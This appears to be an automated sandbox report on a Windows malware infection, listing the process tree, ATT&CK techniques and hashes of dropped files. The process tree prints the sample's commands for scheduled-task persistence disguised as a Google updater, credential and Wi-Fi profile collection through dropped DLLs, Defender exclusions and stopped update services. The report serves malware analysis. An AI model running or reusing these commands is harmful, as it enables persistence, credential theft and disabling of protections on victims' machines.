"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
4⤵
PID:4320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
4⤵
PID:5112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
4⤵
PID:2176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
4⤵
PID:532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
4⤵
PID:4432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
4⤵
PID:6048

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3588 /prefetch:8
4⤵
PID:5400

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3588 /prefetch:8
4⤵
PID:1164

C:\Users\Admin\AppData\Local\Temp\6850.exe
C:\Users\Admin\AppData\Local\Temp\6850.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6996

C:\Users\Admin\AppData\Local\Temp\6DB0.exe
C:\Users\Admin\AppData\Local\Temp\6DB0.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:7964

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:8152

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
4⤵
- Creates scheduled task(s)
PID:6704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8b5234212" /P "Admin:N"&&CACLS "..\e8b5234212" /P "Admin:R" /E&&Exit
4⤵
PID:5348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:5640

C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
5⤵
PID:7032

C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
5⤵
PID:6452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:3920

C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:N"
5⤵
PID:812

C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:R" /E
5⤵
PID:6740

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
4⤵
- Loads dropped DLL
PID:5588

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4020

C:\Windows\system32\netsh.exe
netsh wlan show profiles
6⤵
PID:4144

C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\350690463354_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
6⤵
PID:6160

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:5520

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:6156

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5768

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1308

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5256

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5300

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:7432

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5252

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:2560

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:6332

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:4968

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:6028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
PID:7144

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Modifies data under HKEY_USERS
PID:7752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4160 -ip 4160
1⤵
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2176 -ip 2176
1⤵
PID:4304

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7580

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:6328

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3084

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:5004

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
1⤵
- Executes dropped EXE
PID:4860

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:6232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 8172 -ip 8172
1⤵
PID:5056

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start wuauserv
1⤵
- Launches sc.exe
PID:7936

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\76657b52-44a0-48f2-890f-a32c128538b3.tmp
Filesize
2KB

MD5
41e70c3da56a63ae23d68471cb7b2ffd

SHA1
35510cf724518c67c00bc6368c36f86e9adfb51d

SHA256
27bad44f246853fd5729b2edfd2656ad4232acd81f07683fbdfde8b1ff356987

SHA512
766d64087a2b3e3d88691edaa1fb35834cee1b77de2395a964ef4a6ead0d244decf60c111e2340bb6a40a68022813abeb7e360969071dcb675402c23ba3e2051

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\96e89795-d4c2-4229-bbfe-8e57290ff1f6.tmp
Filesize
2KB

MD5
865531a96f2aed02b010a514c212eccc

SHA1
16e669915ef2ff9290eff9120c7d0818451a61f9

SHA256
473764f499a01956b8af27b71749301bb946e3a71ca56e1f09419097bdfd9537

SHA512
0a7def3ac1316b7ffb1dff1858fc276cb4e48cb2984b15bda520b790b75c469a7ff873dd1a5097eabce5bb53ed0365820156c3fc174e1aac569f59f02066a6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
777424efaa0b7dc4020fed63a05319cf

SHA1
f4ff37d51b7dd7a46606762c1531644b8fbc99c7

SHA256
30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5

SHA512
7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
777424efaa0b7dc4020fed63a05319cf

SHA1
f4ff37d51b7dd7a46606762c1531644b8fbc99c7

SHA256
30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5

SHA512
7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
777424efaa0b7dc4020fed63a05319cf

SHA1
f4ff37d51b7dd7a46606762c1531644b8fbc99c7

SHA256
30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5

SHA512
7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
777424efaa0b7dc4020fed63a05319cf

SHA1
f4ff37d51b7dd7a46606762c1531644b8fbc99c7

SHA256
30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5

SHA512
7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
777424efaa0b7dc4020fed63a05319cf

SHA1
f4ff37d51b7dd7a46606762c1531644b8fbc99c7

SHA256
30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5

SHA512
7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
777424efaa0b7dc4020fed63a05319cf

SHA1
f4ff37d51b7dd7a46606762c1531644b8fbc99c7

SHA256
30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5

SHA512
7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
777424efaa0b7dc4020fed63a05319cf

SHA1
f4ff37d51b7dd7a46606762c1531644b8fbc99c7

SHA256
30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5

SHA512
7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
777424efaa0b7dc4020fed63a05319cf

SHA1
f4ff37d51b7dd7a46606762c1531644b8fbc99c7

SHA256
30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5

SHA512
7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
a6f7b2ec8ee0370d856a5d57385c1863

SHA1
f099e9985e62022ffd4977e26a6b0e98cc30dba1

SHA256
8f211731345f55a3a6fba8a3dcb1263ea8a6d2ab2fb8d0bf7a44ef3c041e3ada

SHA512
5f64034051886f20f42b0136855cbb7ea6c0486a9e71c73e5c28efbdfbfe871b661bd675d5789c4222cfc450751db68f9cc0b054c2de2337fa285b7ef496d268

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
851b75ac3883d544da0fe0aecb139e99

SHA1
ab0fd94cf6138da740ade917317df06539039653

SHA256
f0448c0801e3385f343e32b9bab7335d3e6fdb7f3dfb77913f1282fa9a352b0e

SHA512
6714aa5b5c3bfd16f9a9bee96eb4a500b2f604e942a98d0bad93e948774305730ba8d48a53654dec843862ef7a704d059063ad65656ba0987b6a1b08bc0e598b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
830a19c1047deab0731b0b8426e2d9ea

SHA1
b0923513885d1989cf11cda26febd1df9f936f14

SHA256
7ac669f623dcc25a3c30d4e25187b801dcd63d483119f80915fe94979063bf2c

SHA512
a1578bab9e5a88f00818ddbb388ca9e21b09871b892c39c7f95d4107eaf12c02494ee8b60b6ceeef10fc3110956359ffe65190cc13b141a4f3e975abad9cc809

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
676fdf8e4189ab6cf963cceac035784f

SHA1
985a4e58d99afb9ee62c1efd73f489c4acb81c19

SHA256
4ee2cc434d760bf69057a8ee455c8da3ce6e8c256252b57b511293d964c0d128

SHA512
cabe2edf7d8f56c1d246a434e5ef418b8d1f42b388d9bc3a76edac09e7381fc10a1ae83992db5e3a658d98026b90ae04b3564a482caed02f1bdd93dbfaf97312

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
bcd9ba59062be9ab987ca0c8baef4562

SHA1
847dd6e0af0f308cecb339e97565b101e4815308

SHA256
6e9ad39d160681dd38e1cb208d87a5a1296951dedc711ab2aeec0c2163d9806e

SHA512
87eb77a159958b8770cc726a48b77a9dc35453dea76ba153aa23e91cfc2f4591bc046491ef3ae20b56a08e6aa60f26e3ad9ed72b907a5ad027c248fef1b004c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
d71fc4f0bb677ff4338fc116515707a5

SHA1
0a7fd7c9b50bab597a5635758ed280e648901589

SHA256
c0ed9f94cafc2bcb034e9a49124f25a3a882941e3d67c86514400e372131fd49

SHA512
52e16423279b0f6169cd6aa2745a7c7d48c287a33400978b7a54c7bc952596c2e22898f38af32be9f00d31d26c2d7ea735ad0505b855ad5ce149d23e796fb4b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
1c706d53e85fb5321a8396d197051531

SHA1
0d92aa8524fb1d47e7ee5d614e58a398c06141a4

SHA256
80c44553381f37e930f1c82a1dc2e77acd7b955ec0dc99d090d5bd6b32c3c932

SHA512
d43867392c553d4afffa45a1b87a74e819964011fb1226ee54e23a98fc63ca80e266730cec6796a2afa435b1ea28aed72c55eae1ae5d31ec778f53be3e2162fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
0eccac9095ebab7504246ad008c69013

SHA1
569aa6c24d14b74278eb420c6bd49ee53fa54d78

SHA256
bf2a186d9fafc93dbc6576037b4ce4abe7031bc60c55a9213d7b4464c7457c92

SHA512
2973d3d0149bfc1e7769639e572901f7a52560fb93ef0abc8595fafcc4cee63d03652833a3ff736c79444e908e2f8bcce4f77f5406f40cbe7ea5b501f224c249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5913bd.TMP
Filesize
1KB

MD5
d7cef3d8ef9fcf0391d791bbfc7026af

SHA1
6dad24166ec36a5a7c27ca98b09ea26ccd390208

SHA256
dd59ef01817fe7c35c9ac65b9936416d75ee2f0e8a92f96eb9abb9ecf2da4fc9

SHA512
e1f6f73ae90ae313d298660a4922b2f36b05aadb4da09b2893b680ba4ad05da4f7e2bf53abb307b10ce474275662ccbb9a81d95e7de4dfdab10a1d7db9aeb641

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
